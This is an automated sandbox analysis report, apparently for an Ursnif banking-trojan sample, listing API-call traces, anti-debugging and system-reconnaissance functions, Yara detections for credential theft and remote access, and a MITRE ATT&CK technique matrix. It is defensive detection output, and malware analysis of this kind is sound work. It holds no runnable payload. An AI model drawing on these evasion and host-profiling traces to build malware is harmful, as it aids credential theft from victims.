            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AE57FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_00AE57FE
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5915A0 FindFirstFileExA,1_2_6E5915A0
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_012757FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_012757FE
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_033D57FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_033D57FE
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E56CA50 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6E56CA50
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E58B1B0 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,1_2_6E58B1B0
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E57AEA0 mov ecx, dword ptr fs:[00000030h] 1_2_6E57AEA0
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5C044E mov eax, dword ptr fs:[00000030h] 1_2_6E5C044E
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5BFF8E push dword ptr fs:[00000030h] 1_2_6E5BFF8E
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5C0384 mov eax, dword ptr fs:[00000030h] 1_2_6E5C0384
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E56CA50 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6E56CA50
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E571350 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6E571350
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E56CBA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6E56CBA0
            Source: rundll32.exe, 00000001.00000002.631790597.00000000032E0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: rundll32.exe, 00000001.00000002.631790597.00000000032E0000.00000002.00000001.sdmp | Binary or memory string: NProgram Manager
            Source: rundll32.exe, 00000001.00000002.631790597.00000000032E0000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: rundll32.exe, 00000001.00000002.631790597.00000000032E0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AE91E5 cpuid 1_2_00AE91E5
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,1_2_6E541000
            Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5410A9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_6E5410A9
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AE91E5 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_00AE91E5
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E58D660 __invoke_watson_if_error,__invoke_watson_if_error,__invoke_watson_if_error,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_6E58D660
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E541CE2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_6E541CE2

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY

            Mitre Att&ck Matrix

            | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Process Injection (2) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
            | Default Accounts | Scheduled Task/Job | Application Shimming (1) | DLL Side-Loading (1) | Process Injection (2) | LSASS Memory | Security Software Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
            | Domain Accounts | At (Linux) | Logon Script (Windows) | Application Shimming (1) | Obfuscated Files or Information (1) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
            | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rundll32 (1) | NTDS | Account Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (3) | SIM Card Swap | | Carrier Billing Fraud |
            | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | System Owner/User Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
            | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
            | External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery (33) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |

            Behavior Graph

            [Behavior graph image not captured. Recoverable details: Behavior Graph ID: 288964; Sample: plushaaf; Start date: 23/09/2020; Architecture: WINDOWS; Score: 80. Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; Yara detected Ursnif. Processes: loaddll32.exe (started); iexplore.exe (started); rundll32.exe started by loaddll32.exe.]